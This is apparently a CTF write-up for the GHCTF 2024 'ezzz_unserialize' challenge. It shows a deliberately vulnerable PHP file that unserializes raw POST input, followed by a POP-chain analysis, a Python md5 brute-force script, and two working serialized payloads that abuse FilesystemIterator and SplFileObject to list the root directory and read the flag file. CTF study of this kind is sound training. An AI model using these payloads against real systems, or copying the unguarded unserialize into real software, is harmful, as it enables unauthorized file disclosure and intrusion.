[GHCTF 2024 新生赛]ezzz_unserialize
源码:
<?php
/*** @Author: hey* @message: Patience is the key in life,I think you'll be able to find vulnerabilities in code audits.* Have fun and Good luck!!!*/
// Disables all error reporting, so notices/warnings raised while the magic
// methods below fire are never shown to the client.
error_reporting(0);

// Each class below is a magic-method "gadget": what matters is which magic
// method it triggers on a property it does not validate (property values
// arrive from unserialize() at the bottom of the file).
class Sakura
{
    public $apple;
    public $strawberry;

    public function __construct($a)
    {
        $this->apple = $a;
    }

    // Runs when the object is destroyed; echoing an object stored in $apple
    // forces that object's __toString().
    function __destruct()
    {
        echo $this->apple;
    }

    // Calls $strawberry as a function; an object stored there has its
    // __invoke() run. PHP requires the return value to be a string.
    public function __toString()
    {
        $new = $this->strawberry;
        return $new();
    }
}

class NoNo
{
    private $peach;

    public function __construct($string)
    {
        $this->peach = $string;
    }

    // Reading an undefined property: fetches $this->$name and then calls the
    // element of it keyed by that same name as a function.
    public function __get($name)
    {
        $var = $this->$name;
        $var[$name]();
    }
}

class BasaraKing
{
    public $orange;
    public $cherry;
    public $arg1;

    // Any undefined method call ends up invoking whatever $orange holds.
    public function __call($arg1, $arg2)
    {
        $function = $this->orange;
        return $function();
    }

    // Reading an undefined property calls ll2() on $cherry; on an object that
    // has no such method this lands in that object's __call().
    public function __get($arg1)
    {
        $this->cherry->ll2('b2');
    }
}

class UkyoTachibana
{
    public $banana;
    public $mangosteen;

    // Calls add() on $banana with errors suppressed by `@`; the result is
    // returned unchanged (PHP requires __toString to return a string).
    public function __toString()
    {
        $long = @$this->banana->add();
        return $long;
    }

    // Writing an undefined property reads $mangosteen->tt2; on an object that
    // lacks that property this triggers its __get().
    public function __set($arg1, $arg2)
    {
        if ($this->mangosteen->tt2) {
            echo "Sakura was the best!!!";
        }
    }
}

class E
{
    public $e;

    // Reading an undefined property walks every property of $this and, for
    // each one, instantiates a class named by the property *name* with the
    // property *value* as constructor argument, then iterates the new object
    // and echoes each element. Both the class name and its argument therefore
    // come straight from the (unserialized) object state.
    public function __get($arg1)
    {
        array_walk($this, function ($Monday, $Tuesday) {
            $Wednesday = new $Tuesday($Monday);
            foreach ($Wednesday as $Thursday) {
                echo ($Thursday . '<br>');
            }
        });
    }
}

class UesugiErii
{
    protected $coconut;

    protected function addMe()
    {
        return "My time with Sakura was my happiest time" . $this->coconut;
    }

    // An undefined method `foo()` is redirected to $this->fooMe($args);
    // the return value is dropped.
    public function __call($func, $args)
    {
        call_user_func([$this, $func . "Me"], $args);
    }
}
class Heraclqs
{
    public $grape;
    public $blueberry;

    // Loose `==` between a 32-char md5 hex digest and the int 123: how this
    // resolves depends on PHP's version-specific string/number comparison
    // rules (PHP 8 tightened them). When it holds, reading the undefined
    // property `hey` on $grape triggers that object's __get().
    public function __invoke()
    {
        if (md5(md5($this->blueberry)) == 123) {
            return $this->grape->hey;
        }
    }
}

class MaiSakatoku
{
    public $Carambola;
    private $Kiwifruit;

    // Note the single `=`: this assigns "Sakura" to Kiwifruit rather than
    // comparing, so the branch is always taken. strtolower()'s result is
    // discarded; its only effect is forcing $Carambola to a string.
    public function __set($name, $value)
    {
        $this->$name = $value;
        if ($this->Kiwifruit = "Sakura") {
            strtolower($this->Carambola);
        }
    }
}

// Entry point: raw POST data is handed to unserialize() with no
// allowed_classes restriction, so any loaded class can be instantiated with
// caller-chosen property values (PHP object injection). Outside a deliberate
// challenge, exchange structured data as JSON instead, or at minimum call
// unserialize($data, ['allowed_classes' => false]).
if (isset($_POST['GHCTF'])) {
    unserialize($_POST['GHCTF']);
} else {
    highlight_file(__FILE__); // no payload posted: show this file's source
}
array_walk函数
array_walk() 函数对数组中的每个元素应用用户自定义函数。
原生类的利用
一.可遍历目录类
DirectoryIterator
FilesystemIterator
GlobIterator 与上面略不同,该类可以通过模式匹配来寻找文件路径。
二.可读取文件类
SplFileObject 在其构造函数中,URL 可作为文件名,不过也要受到 allow_url_fopen 影响。
三.文件系统相关扩展
finfo 该类的构造函数finfo::__construct — 别名 finfo_open(),也可以读取文件。
pop链
E::__get -> Heraclqs::__invoke -> Sakura::__toString -> Sakura::__destruct
Heraclqs::__invoke中有一个弱比较
public function __invoke(){if(md5(md5($this -> blueberry)) == 123) {return $this -> grape -> hey;}}
爆破一下即可
import hashlib
import itertools
import string

# Brute-forces 3-character printable strings s whose double md5,
# md5(md5(s)), has a hex digest beginning with '123', i.e. candidates for the
# loose `== 123` comparison in Heraclqs::__invoke above.
# NOTE: only the 3-char prefix is compared. That approximates PHP 7's loose
# int/string comparison of a leading-numeric string; PHP 8's stricter
# comparison rules generally no longer treat such a hex digest as equal to
# 123, so confirm the target's PHP version before relying on this.
for i in itertools.product(string.printable, repeat=3):
    s = ''.join(i)
    s1 = hashlib.md5(s.encode()).hexdigest()
    s2 = hashlib.md5(s1.encode()).hexdigest()
    if s2[:3] == '123':
        print(s)  # every match is printed; the loop does not stop at the first
payload1:
<?php
// Local stand-ins for the target's classes: same names and the same public
// properties in the same declaration order (serialize() emits declared
// properties in that order, followed by dynamic ones), with the magic methods
// commented out so nothing fires while the payload is built here.
class Sakura
{
    public $apple;
    public $strawberry;
    // function __destruct()
    // {
    //     echo $this -> apple;
    // }
    // public function __toString()
    // {
    //     $new = $this -> strawberry;
    //     return $new();
    // }
}

class E
{
    public $e;
    // public function __get($arg1){
    //     array_walk($this, function ($Monday, $Tuesday) {
    //         $Wednesday = new $Tuesday($Monday);
    //         foreach($Wednesday as $Thursday){
    //             echo ($Thursday.'<br>');
    //         }
    //     });
    // }
}

class Heraclqs
{
    public $grape;
    public $blueberry;
    // public function __invoke(){
    //     if(md5(md5($this -> blueberry)) == 123) {
    //         return $this -> grape -> hey;
    //     }
    // }
}

$a1 = new E;
// Dynamic property: in the target's E::__get the property *name* is used as
// the class to instantiate and the *value* as its constructor argument;
// iterating a FilesystemIterator over '/' echoes the directory entries.
$a1->FilesystemIterator = '/';

$a2 = new Heraclqs;
$a2->blueberry = 'LLh';  // value reported by the brute-force script above for the `== 123` check
$a2->grape = $a1;

$a3 = new Sakura;
$a3->strawberry = $a2;

$a4 = new Sakura;
$a4->apple = $a3;

$s = serialize($a4);
echo $s;
?>
//O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:18:"FilesystemIterator";s:1:"/";}s:9:"blueberry";s:3:"LLh";}}s:10:"strawberry";N;}
payload2:
<?php
// Same local stand-ins as payload 1: identical class names and property
// declaration order (serialize() emits declared properties in that order,
// then dynamic ones), magic methods commented out so nothing fires locally.
class Sakura
{
    public $apple;
    public $strawberry;
    // function __destruct()
    // {
    //     echo $this -> apple;
    // }
    // public function __toString()
    // {
    //     $new = $this -> strawberry;
    //     return $new();
    // }
}

class E
{
    public $e;
    // public function __get($arg1){
    //     array_walk($this, function ($Monday, $Tuesday) {
    //         $Wednesday = new $Tuesday($Monday);
    //         foreach($Wednesday as $Thursday){
    //             echo ($Thursday.'<br>');
    //         }
    //     });
    // }
}

class Heraclqs
{
    public $grape;
    public $blueberry;
    // public function __invoke(){
    //     if(md5(md5($this -> blueberry)) == 123) {
    //         return $this -> grape -> hey;
    //     }
    // }
}

$a1 = new E;
// Only difference from payload 1: the dynamic property now names
// SplFileObject, whose constructor opens the path given as the value;
// iterating it in the target's E::__get echoes the file line by line.
$a1->SplFileObject = '/1_ffffffflllllagggggg';

$a2 = new Heraclqs;
$a2->blueberry = 'LLh';  // value reported by the brute-force script above for the `== 123` check
$a2->grape = $a1;

$a3 = new Sakura;
$a3->strawberry = $a2;

$a4 = new Sakura;
$a4->apple = $a3;

$s = serialize($a4);
echo $s;
?>
//O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:13:"SplFileObject";s:22:"/1_ffffffflllllagggggg";}s:9:"blueberry";s:3:"LLh";}}s:10:"strawberry";N;}